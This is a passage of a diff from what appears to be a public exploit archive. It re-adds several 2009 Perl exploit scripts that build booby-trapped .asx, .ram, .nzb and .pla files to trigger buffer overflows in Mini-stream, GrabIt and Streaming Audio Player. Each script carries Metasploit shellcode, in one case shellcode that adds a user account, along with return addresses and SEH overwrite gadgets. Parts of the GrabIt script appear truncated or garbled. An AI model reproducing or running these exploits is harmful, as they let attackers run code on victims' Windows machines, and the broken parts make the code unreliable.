+	[»] Script:.............[ Mini-stream Ripper 3.0.1.1 ]..................
+	[»] Website:............[ http://mini-stream.net/ ].....................
+	[»] Today:..............[ 07052009 ]....................................
+	[»] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ].........
+==============================================================================
+
+	[x] tested on Windows XP SP2...
+	[x] if you are not able to make this shit work, just put it in the Base/Root
+	    of a Drive/Partition, like "C:\gnk.asx"...
+
+=cut
+
+my $MSD = "G" x 26110;
+my $SMN = "\x90" x 16;
+my $RA = "\x5D\x38\x82\x7C"; # Kernel32.dll
+
+# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
+my $Shcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08".
+             "\x99\x23\x82\x83\xeb\xfc\xe2\xf4\xf4\x71\x67\x82\x08\x99\xa8\xc7".
+             "\x34\x12\x5f\x87\x70\x98\xcc\x09\x47\x81\xa8\xdd\x28\x98\xc8\xcb".
+             "\x83\xad\xa8\x83\xe6\xa8\xe3\x1b\xa4\x1d\xe3\xf6\x0f\x58\xe9\x8f".
+             "\x09\x5b\xc8\x76\x33\xcd\x07\x86\x7d\x7c\xa8\xdd\x2c\x98\xc8\xe4".
+             "\x83\x95\x68\x09\x57\x85\x22\x69\x83\x85\xa8\x83\xe3\x10\x7f\xa6".
+             "\x0c\x5a\x12\x42\x6c\x12\x63\xb2\x8d\x59\x5b\x8e\x83\xd9\x2f\x09".
+             "\x78\x85\x8e\x09\x60\x91\xc8\x8b\x83\x19\x93\x82\x08\x99\xa8\xea".
+             "\x34\xc6\x12\x74\x68\xcf\xaa\x7a\x8b\x59\x58\xd2\x60\x69\xa9\x86".
+             "\x57\xf1\xbb\x7c\x82\x97\x74\x7d\xef\xfa\x42\xee\x6b\x99\x23\x82";
+
+my $ASX = 
+"
+  Title is not important.
+  
+    Example...
+    
+    G4N0K
+    ©2009 G4N0K
+  
+";
+
+  open(ASX,'>>gnk.asx');
+  print ASX $ASX;
+  close(ASX);
+
+# milw0rm.com [2009-05-07]
diff --git a/platforms/windows/local/8633.pl b/platforms/windows/local/8633.pl
index 75bbd1b29..2704d5f0a 100755
--- a/platforms/windows/local/8633.pl
+++ b/platforms/windows/local/8633.pl
@@ -1,50 +1,50 @@
-#!/usr/bin/perl
-=gnk
-==============================================================================
-                      _      _       _          _      _   _ 
-                     / \    | |     | |        / \    | | | |
-                    / _ \   | |     | |       / _ \   | |_| |
-                   / ___ \  | |___  | |___   / ___ \  |  _  |
-   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
-                                                             
-==============================================================================
-                      ____   _  _     _   _    ___    _  __
-                     / ___| | || |   | \ | |  / _ \  | |/ /
-                    | |  _  | || |_  |  \| | | | | | | ' / 
-                    | |_| | |__   _| | |\  | | |_| | | . \ 
-                     \____|    |_|   |_| \_|  \___/  |_|\_\...From Iran
-
-==============================================================================
-	Mini-stream RM-MP3 Converter 3.0.0.7 (.RAM) Local Buffer Overflow Exploit
-==============================================================================
-	[»] Script:.............[ Mini-stream RM-MP3 Converter 3.0.0.7 ]........
-	[»] Website:............[ http://mini-stream.net/ ].....................
-	[»] Today:..............[ 07052009 ]....................................
-	[»] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ].........
-==============================================================================
-
-	[x] tested on "Windows XP SP2"... [:-)
-	
-=cut
-
-my $MSD = "rtsp://"."G" x 26117;
-my $SMN = "\x90" x 16;
-my $RA = "\x5D\x38\x82\x7C"; # Kernel32.dll
-
-# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
-my $Shcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08".
-             "\x99\x23\x82\x83\xeb\xfc\xe2\xf4\xf4\x71\x67\x82\x08\x99\xa8\xc7".
-             "\x34\x12\x5f\x87\x70\x98\xcc\x09\x47\x81\xa8\xdd\x28\x98\xc8\xcb".
-             "\x83\xad\xa8\x83\xe6\xa8\xe3\x1b\xa4\x1d\xe3\xf6\x0f\x58\xe9\x8f".
-             "\x09\x5b\xc8\x76\x33\xcd\x07\x86\x7d\x7c\xa8\xdd\x2c\x98\xc8\xe4".
-             "\x83\x95\x68\x09\x57\x85\x22\x69\x83\x85\xa8\x83\xe3\x10\x7f\xa6".
-             "\x0c\x5a\x12\x42\x6c\x12\x63\xb2\x8d\x59\x5b\x8e\x83\xd9\x2f\x09".
-             "\x78\x85\x8e\x09\x60\x91\xc8\x8b\x83\x19\x93\x82\x08\x99\xa8\xea".
-             "\x34\xc6\x12\x74\x68\xcf\xaa\x7a\x8b\x59\x58\xd2\x60\x69\xa9\x86".
-             "\x57\xf1\xbb\x7c\x82\x97\x74\x7d\xef\xfa\x42\xee\x6b\x99\x23\x82";
-
-  open(RAM,'>>gnk.ram');
-  print RAM $MSD.$RA.$SMN.$Shcode;
-  close(RAM);
-
-# milw0rm.com [2009-05-07]
+#!/usr/bin/perl
+=gnk
+==============================================================================
+                      _      _       _          _      _   _ 
+                     / \    | |     | |        / \    | | | |
+                    / _ \   | |     | |       / _ \   | |_| |
+                   / ___ \  | |___  | |___   / ___ \  |  _  |
+   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
+                                                             
+==============================================================================
+                      ____   _  _     _   _    ___    _  __
+                     / ___| | || |   | \ | |  / _ \  | |/ /
+                    | |  _  | || |_  |  \| | | | | | | ' / 
+                    | |_| | |__   _| | |\  | | |_| | | . \ 
+                     \____|    |_|   |_| \_|  \___/  |_|\_\...From Iran
+
+==============================================================================
+	Mini-stream RM-MP3 Converter 3.0.0.7 (.RAM) Local Buffer Overflow Exploit
+==============================================================================
+	[»] Script:.............[ Mini-stream RM-MP3 Converter 3.0.0.7 ]........
+	[»] Website:............[ http://mini-stream.net/ ].....................
+	[»] Today:..............[ 07052009 ]....................................
+	[»] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ].........
+==============================================================================
+
+	[x] tested on "Windows XP SP2"... [:-)
+	
+=cut
+
+my $MSD = "rtsp://"."G" x 26117;
+my $SMN = "\x90" x 16;
+my $RA = "\x5D\x38\x82\x7C"; # Kernel32.dll
+
+# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
+my $Shcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08".
+             "\x99\x23\x82\x83\xeb\xfc\xe2\xf4\xf4\x71\x67\x82\x08\x99\xa8\xc7".
+             "\x34\x12\x5f\x87\x70\x98\xcc\x09\x47\x81\xa8\xdd\x28\x98\xc8\xcb".
+             "\x83\xad\xa8\x83\xe6\xa8\xe3\x1b\xa4\x1d\xe3\xf6\x0f\x58\xe9\x8f".
+             "\x09\x5b\xc8\x76\x33\xcd\x07\x86\x7d\x7c\xa8\xdd\x2c\x98\xc8\xe4".
+             "\x83\x95\x68\x09\x57\x85\x22\x69\x83\x85\xa8\x83\xe3\x10\x7f\xa6".
+             "\x0c\x5a\x12\x42\x6c\x12\x63\xb2\x8d\x59\x5b\x8e\x83\xd9\x2f\x09".
+             "\x78\x85\x8e\x09\x60\x91\xc8\x8b\x83\x19\x93\x82\x08\x99\xa8\xea".
+             "\x34\xc6\x12\x74\x68\xcf\xaa\x7a\x8b\x59\x58\xd2\x60\x69\xa9\x86".
+             "\x57\xf1\xbb\x7c\x82\x97\x74\x7d\xef\xfa\x42\xee\x6b\x99\x23\x82";
+
+  open(RAM,'>>gnk.ram');
+  print RAM $MSD.$RA.$SMN.$Shcode;
+  close(RAM);
+
+# milw0rm.com [2009-05-07]
diff --git a/platforms/windows/local/8634.pl b/platforms/windows/local/8634.pl
index 95f42817a..65abe1612 100755
--- a/platforms/windows/local/8634.pl
+++ b/platforms/windows/local/8634.pl
@@ -1,63 +1,63 @@
-#!/usr/bin/perl
-=gnk
-==============================================================================
-                      _      _       _          _      _   _ 
-                     / \    | |     | |        / \    | | | |
-                    / _ \   | |     | |       / _ \   | |_| |
-                   / ___ \  | |___  | |___   / ___ \  |  _  |
-   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
-                                                             
-==============================================================================
-                      ____   _  _     _   _    ___    _  __
-                     / ___| | || |   | \ | |  / _ \  | |/ /
-                    | |  _  | || |_  |  \| | | | | | | ' / 
-                    | |_| | |__   _| | |\  | | |_| | | . \ 
-                     \____|    |_|   |_| \_|  \___/  |_|\_\...From Iran
-
-==============================================================================
-	Mini-stream RM-MP3 Converter 3.0.0.7 .ASX File (HREF) Local Buffer Overflow Exploit
-==============================================================================
-	[»] Script:.............[ Mini-stream RM-MP3 Converter 3.0.0.7 ]........
-	[»] Website:............[ http://mini-stream.net/ ].....................
-	[»] Today:..............[ 07052009 ]....................................
-	[»] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ].........
-==============================================================================
-
-	[x] tested on Windows XP SP2...
-	[x] if you are not able to make this shit work, just put it in the Base/Root
-	    of a Drive/Partition, like "C:\gnk.asx"...
-
-=cut
-
-my $MSD = "G" x 26110;
-my $SMN = "\x90" x 16;
-my $RA = "\x5D\x38\x82\x7C"; # Kernel32.dll
-
-# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
-my $Shcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08".
-             "\x99\x23\x82\x83\xeb\xfc\xe2\xf4\xf4\x71\x67\x82\x08\x99\xa8\xc7".
-             "\x34\x12\x5f\x87\x70\x98\xcc\x09\x47\x81\xa8\xdd\x28\x98\xc8\xcb".
-             "\x83\xad\xa8\x83\xe6\xa8\xe3\x1b\xa4\x1d\xe3\xf6\x0f\x58\xe9\x8f".
-             "\x09\x5b\xc8\x76\x33\xcd\x07\x86\x7d\x7c\xa8\xdd\x2c\x98\xc8\xe4".
-             "\x83\x95\x68\x09\x57\x85\x22\x69\x83\x85\xa8\x83\xe3\x10\x7f\xa6".
-             "\x0c\x5a\x12\x42\x6c\x12\x63\xb2\x8d\x59\x5b\x8e\x83\xd9\x2f\x09".
-             "\x78\x85\x8e\x09\x60\x91\xc8\x8b\x83\x19\x93\x82\x08\x99\xa8\xea".
-             "\x34\xc6\x12\x74\x68\xcf\xaa\x7a\x8b\x59\x58\xd2\x60\x69\xa9\x86".
-             "\x57\xf1\xbb\x7c\x82\x97\x74\x7d\xef\xfa\x42\xee\x6b\x99\x23\x82";
-
-my $ASX = 
-"
-  Title is not important.
-  
-    Example...
-    
-    G4N0K
-    ©2009 G4N0K
-  
-";
-
-  open(ASX,'>>gnk.asx');
-  print ASX $ASX;
-  close(ASX);
-
-# milw0rm.com [2009-05-07]
+#!/usr/bin/perl
+=gnk
+==============================================================================
+                      _      _       _          _      _   _ 
+                     / \    | |     | |        / \    | | | |
+                    / _ \   | |     | |       / _ \   | |_| |
+                   / ___ \  | |___  | |___   / ___ \  |  _  |
+   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
+                                                             
+==============================================================================
+                      ____   _  _     _   _    ___    _  __
+                     / ___| | || |   | \ | |  / _ \  | |/ /
+                    | |  _  | || |_  |  \| | | | | | | ' / 
+                    | |_| | |__   _| | |\  | | |_| | | . \ 
+                     \____|    |_|   |_| \_|  \___/  |_|\_\...From Iran
+
+==============================================================================
+	Mini-stream RM-MP3 Converter 3.0.0.7 .ASX File (HREF) Local Buffer Overflow Exploit
+==============================================================================
+	[»] Script:.............[ Mini-stream RM-MP3 Converter 3.0.0.7 ]........
+	[»] Website:............[ http://mini-stream.net/ ].....................
+	[»] Today:..............[ 07052009 ]....................................
+	[»] Exploited by:.......[ G4N0K | mail[.]ganok[sh!t]gmail.com ].........
+==============================================================================
+
+	[x] tested on Windows XP SP2...
+	[x] if you are not able to make this shit work, just put it in the Base/Root
+	    of a Drive/Partition, like "C:\gnk.asx"...
+
+=cut
+
+my $MSD = "G" x 26110;
+my $SMN = "\x90" x 16;
+my $RA = "\x5D\x38\x82\x7C"; # Kernel32.dll
+
+# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
+my $Shcode = "\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08".
+             "\x99\x23\x82\x83\xeb\xfc\xe2\xf4\xf4\x71\x67\x82\x08\x99\xa8\xc7".
+             "\x34\x12\x5f\x87\x70\x98\xcc\x09\x47\x81\xa8\xdd\x28\x98\xc8\xcb".
+             "\x83\xad\xa8\x83\xe6\xa8\xe3\x1b\xa4\x1d\xe3\xf6\x0f\x58\xe9\x8f".
+             "\x09\x5b\xc8\x76\x33\xcd\x07\x86\x7d\x7c\xa8\xdd\x2c\x98\xc8\xe4".
+             "\x83\x95\x68\x09\x57\x85\x22\x69\x83\x85\xa8\x83\xe3\x10\x7f\xa6".
+             "\x0c\x5a\x12\x42\x6c\x12\x63\xb2\x8d\x59\x5b\x8e\x83\xd9\x2f\x09".
+             "\x78\x85\x8e\x09\x60\x91\xc8\x8b\x83\x19\x93\x82\x08\x99\xa8\xea".
+             "\x34\xc6\x12\x74\x68\xcf\xaa\x7a\x8b\x59\x58\xd2\x60\x69\xa9\x86".
+             "\x57\xf1\xbb\x7c\x82\x97\x74\x7d\xef\xfa\x42\xee\x6b\x99\x23\x82";
+
+my $ASX = 
+"
+  Title is not important.
+  
+    Example...
+    
+    G4N0K
+    ©2009 G4N0K
+  
+";
+
+  open(ASX,'>>gnk.asx');
+  print ASX $ASX;
+  close(ASX);
+
+# milw0rm.com [2009-05-07]
diff --git a/platforms/windows/local/8637.pl b/platforms/windows/local/8637.pl
index 9daeed47f..ee6d063c8 100755
--- a/platforms/windows/local/8637.pl
+++ b/platforms/windows/local/8637.pl
@@ -1,90 +1,90 @@
-#!/usr/bin/perl
-# theroadoutsidemyhouseispavedwithgoodintentions.pl
-# AKA
-# GrabIt 1.7.2x NZB DTD Reference Buffer Overflow Exploit
-# BY
-# Jeremy Brown [0xjbrown41@gmail.com] 05.07.2009
-# ***********************************************************************************************************
-# It seems I couldn't gather my resources quickly enough before the first exploit came out.. and it came as
-# no surprise that it was a disappointment like so many others out there. I personally used to use this
-# newsgroup program all the time, usenet is a nice service :) GrabIt is great-- Kudos to Shemes for sure.
-# ***********************************************************************************************************
-# After reading the advisory then debugging, I found the bug is a fairly standard hit and run stack overflow..
-# we can overwrite SEH like a dream, so sadly this one may turn into malware rather quickly.. uh oh. Advice
-# at the moment shall be.. update GrabIt quickly, like right now!
-# ***********************************************************************************************************
-#                libeay32.dll
-#
-# 1001A384   5B               POP EBX
-# 1001A385   5D               POP EBP
-# 1001A386   C3               RETN
-#
-# This exploit has been successfully tested in the following environments...
-#
-# Windows XP Home SP3 -> GrabIt 1.7.2b3 (GrabIt172b3.exe)
-#                        GrabIt 1.7.2b2 (GrabIt172b2.exe)
-#                        GrabIt 1.7.2b  (GrabIt172b.exe)
-#
-# Windows XP Pro SP3  -> GrabIt 1.7.2b3 (GrabIt172b3.exe)
-#                        GrabIt 1.7.2b2 (GrabIt172b2.exe)
-#                        GrabIt 1.7.2b  (GrabIt172b.exe)
-#
-# ***********************************************************************************************************
-# BRONBRONGOTMVP: The Houston and LA series is heating up! I got the Lakers in 6 :D
-# ***********************************************************************************************************
-# theroadoutsidemyhouseispavedwithgoodintentions.pl
-
-$nextsehh = 0x909006EB; # jmp 6
-$sehh     = 0x1001A384; # pop, pop, ret @ libeay32.dll
-
-# win32_adduser -  PASS=face EXITFUNC=process USER=smiley Size=236 Encoder=PexFnstenvSub http://metasploit.com
-$sc = "\x31\xc9\x83\xe9\xcb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8".
-      "\x5b\xc1\xe6\x83\xeb\xfc\xe2\xf4\x14\xb3\x85\xe6\xe8\x5b\x4a\xa3".
-      "\xd4\xd0\xbd\xe3\x90\x5a\x2e\x6d\xa7\x43\x4a\xb9\xc8\x5a\x2a\xaf".
-      "\x63\x6f\x4a\xe7\x06\x6a\x01\x7f\x44\xdf\x01\x92\xef\x9a\x0b\xeb".
-      "\xe9\x99\x2a\x12\xd3\x0f\xe5\xe2\x9d\xbe\x4a\xb9\xcc\x5a\x2a\x80".
-      "\x63\x57\x8a\x6d\xb7\x47\xc0\x0d\x63\x47\x4a\xe7\x03\xd2\x9d\xc2".
-      "\xec\x98\xf0\x26\x8c\xd0\x81\xd6\x6d\x9b\xb9\xea\x63\x1b\xcd\x6d".
-      "\x98\x47\x6c\x6d\x80\x53\x2a\xef\x63\xdb\x71\xe6\xe8\x5b\x4a\x8e".
-      "\xd4\x04\xf0\x10\x88\x0d\x48\x1e\x6b\x9b\xba\xb6\x80\x25\x19\x04".
-      "\x9b\x33\x59\x18\x62\x55\x96\x19\x0f\x38\xac\x82\xc6\x3e\xb9\x83".
-      "\xc8\x74\xa2\xc6\x86\x3e\xb5\xc6\x9d\x28\xa4\x94\xc8\x28\xac\x8f".
-      "\x84\x3e\xb8\xc6\x8e\x3a\xa2\x83\xc8\x74\x80\xa2\xac\x7b\xe7\xc0".
-      "\xc8\x35\xa4\x92\xc8\x37\xae\x85\x89\x37\xa6\x94\x87\x2e\xb1\xc6".
-      "\xa9\x3f\xac\x8f\x86\x32\xb2\x92\x9a\x3a\xb5\x89\x9a\x28\xe1\x95".
-      "\x85\x32\xad\x83\x91\x7b\xee\xa7\xac\x1f\xc1\xe6";
-
-$filename = $ARGV[0];
-$target   = $ARGV[1];
-
-     print "\n            GrabIt 1.7.2x NZB DTD Reference Buffer Overflow Exploit";
-     print "\n                     Jeremy Brown [0xjbrown41\@gmail.com]\n";
-
-if((!defined($filename) || !defined($target)))
-{
-
-     print "\nUsage: $0 pwn.nzb \n";
-     print "\nTargets: [1] Windows XP Home\n         [2] Windows XP Pro\n\n";
-     exit;
-
-}
-
-$nextseh = pack('l', $nextsehh);
-$seh     = pack('l', $sehh);
-$nop     = "\x90";
-
-$nzb1 = "\n";
-$nzb2 = ""; }
-if($target == "2") { $payload = $nzb1 . $nzb2 . $nop x 251 . $nextseh . $seh . $nop x 32 . $sc . "\">"; }
-
-     open(FILE, ">", $filename) or die("\nError: Can't write to $filename! Exploit stopped");
-     print FILE $payload;
-     close(FILE);
-
-     print "\nExploit NZB \"$filename\" successfully created.\n\n";
-     exit;
-
-# milw0rm.com [2009-05-07]
+#!/usr/bin/perl
+# theroadoutsidemyhouseispavedwithgoodintentions.pl
+# AKA
+# GrabIt 1.7.2x NZB DTD Reference Buffer Overflow Exploit
+# BY
+# Jeremy Brown [0xjbrown41@gmail.com] 05.07.2009
+# ***********************************************************************************************************
+# It seems I couldn't gather my resources quickly enough before the first exploit came out.. and it came as
+# no surprise that it was a disappointment like so many others out there. I personally used to use this
+# newsgroup program all the time, usenet is a nice service :) GrabIt is great-- Kudos to Shemes for sure.
+# ***********************************************************************************************************
+# After reading the advisory then debugging, I found the bug is a fairly standard hit and run stack overflow..
+# we can overwrite SEH like a dream, so sadly this one may turn into malware rather quickly.. uh oh. Advice
+# at the moment shall be.. update GrabIt quickly, like right now!
+# ***********************************************************************************************************
+#                libeay32.dll
+#
+# 1001A384   5B               POP EBX
+# 1001A385   5D               POP EBP
+# 1001A386   C3               RETN
+#
+# This exploit has been successfully tested in the following environments...
+#
+# Windows XP Home SP3 -> GrabIt 1.7.2b3 (GrabIt172b3.exe)
+#                        GrabIt 1.7.2b2 (GrabIt172b2.exe)
+#                        GrabIt 1.7.2b  (GrabIt172b.exe)
+#
+# Windows XP Pro SP3  -> GrabIt 1.7.2b3 (GrabIt172b3.exe)
+#                        GrabIt 1.7.2b2 (GrabIt172b2.exe)
+#                        GrabIt 1.7.2b  (GrabIt172b.exe)
+#
+# ***********************************************************************************************************
+# BRONBRONGOTMVP: The Houston and LA series is heating up! I got the Lakers in 6 :D
+# ***********************************************************************************************************
+# theroadoutsidemyhouseispavedwithgoodintentions.pl
+
+$nextsehh = 0x909006EB; # jmp 6
+$sehh     = 0x1001A384; # pop, pop, ret @ libeay32.dll
+
+# win32_adduser -  PASS=face EXITFUNC=process USER=smiley Size=236 Encoder=PexFnstenvSub http://metasploit.com
+$sc = "\x31\xc9\x83\xe9\xcb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe8".
+      "\x5b\xc1\xe6\x83\xeb\xfc\xe2\xf4\x14\xb3\x85\xe6\xe8\x5b\x4a\xa3".
+      "\xd4\xd0\xbd\xe3\x90\x5a\x2e\x6d\xa7\x43\x4a\xb9\xc8\x5a\x2a\xaf".
+      "\x63\x6f\x4a\xe7\x06\x6a\x01\x7f\x44\xdf\x01\x92\xef\x9a\x0b\xeb".
+      "\xe9\x99\x2a\x12\xd3\x0f\xe5\xe2\x9d\xbe\x4a\xb9\xcc\x5a\x2a\x80".
+      "\x63\x57\x8a\x6d\xb7\x47\xc0\x0d\x63\x47\x4a\xe7\x03\xd2\x9d\xc2".
+      "\xec\x98\xf0\x26\x8c\xd0\x81\xd6\x6d\x9b\xb9\xea\x63\x1b\xcd\x6d".
+      "\x98\x47\x6c\x6d\x80\x53\x2a\xef\x63\xdb\x71\xe6\xe8\x5b\x4a\x8e".
+      "\xd4\x04\xf0\x10\x88\x0d\x48\x1e\x6b\x9b\xba\xb6\x80\x25\x19\x04".
+      "\x9b\x33\x59\x18\x62\x55\x96\x19\x0f\x38\xac\x82\xc6\x3e\xb9\x83".
+      "\xc8\x74\xa2\xc6\x86\x3e\xb5\xc6\x9d\x28\xa4\x94\xc8\x28\xac\x8f".
+      "\x84\x3e\xb8\xc6\x8e\x3a\xa2\x83\xc8\x74\x80\xa2\xac\x7b\xe7\xc0".
+      "\xc8\x35\xa4\x92\xc8\x37\xae\x85\x89\x37\xa6\x94\x87\x2e\xb1\xc6".
+      "\xa9\x3f\xac\x8f\x86\x32\xb2\x92\x9a\x3a\xb5\x89\x9a\x28\xe1\x95".
+      "\x85\x32\xad\x83\x91\x7b\xee\xa7\xac\x1f\xc1\xe6";
+
+$filename = $ARGV[0];
+$target   = $ARGV[1];
+
+     print "\n            GrabIt 1.7.2x NZB DTD Reference Buffer Overflow Exploit";
+     print "\n                     Jeremy Brown [0xjbrown41\@gmail.com]\n";
+
+if((!defined($filename) || !defined($target)))
+{
+
+     print "\nUsage: $0 pwn.nzb \n";
+     print "\nTargets: [1] Windows XP Home\n         [2] Windows XP Pro\n\n";
+     exit;
+
+}
+
+$nextseh = pack('l', $nextsehh);
+$seh     = pack('l', $sehh);
+$nop     = "\x90";
+
+$nzb1 = "\n";
+$nzb2 = ""; }
+if($target == "2") { $payload = $nzb1 . $nzb2 . $nop x 251 . $nextseh . $seh . $nop x 32 . $sc . "\">"; }
+
+     open(FILE, ">", $filename) or die("\nError: Can't write to $filename! Exploit stopped");
+     print FILE $payload;
+     close(FILE);
+
+     print "\nExploit NZB \"$filename\" successfully created.\n\n";
+     exit;
+
+# milw0rm.com [2009-05-07]
diff --git a/platforms/windows/local/8640.pl b/platforms/windows/local/8640.pl
index ae04a782a..eaab06e6f 100755
--- a/platforms/windows/local/8640.pl
+++ b/platforms/windows/local/8640.pl
@@ -1,42 +1,42 @@
-# by : Hakxer -> EgY Coders Team
-# Streaming Audio Player 0.9 (.PLA File) Local Stack Overflow Exploit
-# hakxer.1@gmail.com
-# Greetz : Allah
-#                , ExH , ProViDoR , Error Code , Br1ght D@rk , all my friends
-##########################################################################
- 
-$buff="\x41" x 288;
-$ret="\x77\xE9\xAE\x59"; # 0x77E9AE59      call esp
-$nops="\x90" x 20;
-# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
-$shellcode =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
-"\x42\x30\x42\x30\x42\x50\x4b\x48\x45\x44\x4e\x43\x4b\x48\x4e\x37".
-"\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x31\x4b\x38".
-"\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x43\x4b\x48".
-"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c".
-"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x43\x46\x45\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x38".
-"\x4f\x55\x46\x52\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x30\x4b\x34".
-"\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x41\x4b\x58".
-"\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x32\x46\x50\x43\x4c\x41\x43".
-"\x42\x4c\x46\x46\x4b\x58\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x37".
-"\x4e\x50\x4b\x38\x42\x44\x4e\x50\x4b\x58\x42\x47\x4e\x31\x4d\x4a".
-"\x4b\x58\x4a\x56\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x58\x42\x4b".
-"\x42\x50\x42\x30\x42\x50\x4b\x38\x4a\x46\x4e\x43\x4f\x55\x41\x53".
-"\x48\x4f\x42\x36\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x47".
-"\x42\x35\x4a\x36\x42\x4f\x4c\x48\x46\x50\x4f\x55\x4a\x56\x4a\x39".
-"\x50\x4f\x4c\x38\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x36\x41\x56".
-"\x4e\x36\x43\x56\x42\x50\x5a";
-open(MYFILE,'>>exploit.pla');
-print MYFILE $buff;
-print MYFILE $ret;
-print MYFILE $nops;
-print MYFILE $shellcode;
-close(MYFILE);
-
-# milw0rm.com [2009-05-07]
+# by : Hakxer -> EgY Coders Team
+# Streaming Audio Player 0.9 (.PLA File) Local Stack Overflow Exploit
+# hakxer.1@gmail.com
+# Greetz : Allah
+#                , ExH , ProViDoR , Error Code , Br1ght D@rk , all my friends
+##########################################################################
+ 
+$buff="\x41" x 288;
+$ret="\x77\xE9\xAE\x59"; # 0x77E9AE59      call esp
+$nops="\x90" x 20;
+# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
+$shellcode =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
+"\x42\x30\x42\x30\x42\x50\x4b\x48\x45\x44\x4e\x43\x4b\x48\x4e\x37".
+"\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x31\x4b\x38".
+"\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x43\x4b\x48".
+"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c".
+"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x43\x46\x45\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x38".
+"\x4f\x55\x46\x52\x41\x30\x4b\x4e\x48\x56\x4b\x38\x4e\x30\x4b\x34".
+"\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x41\x4b\x58".
+"\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x32\x46\x50\x43\x4c\x41\x43".
+"\x42\x4c\x46\x46\x4b\x58\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x37".
+"\x4e\x50\x4b\x38\x42\x44\x4e\x50\x4b\x58\x42\x47\x4e\x31\x4d\x4a".
+"\x4b\x58\x4a\x56\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x58\x42\x4b".
+"\x42\x50\x42\x30\x42\x50\x4b\x38\x4a\x46\x4e\x43\x4f\x55\x41\x53".
+"\x48\x4f\x42\x36\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x47".
+"\x42\x35\x4a\x36\x42\x4f\x4c\x48\x46\x50\x4f\x55\x4a\x56\x4a\x39".
+"\x50\x4f\x4c\x38\x50\x30\x47\x55\x4f\x4f\x47\x4e\x43\x36\x41\x56".
+"\x4e\x36\x43\x56\x42\x50\x5a";
+open(MYFILE,'>>exploit.pla');
+print MYFILE $buff;
+print MYFILE $ret;
+print MYFILE $nops;
+print MYFILE $shellcode;
+close(MYFILE);
+
+# milw0rm.com [2009-05-07]
diff --git a/platforms/windows/local/8656.py b/platforms/windows/local/8656.py
index f62a00f6c..f094c2020 100755
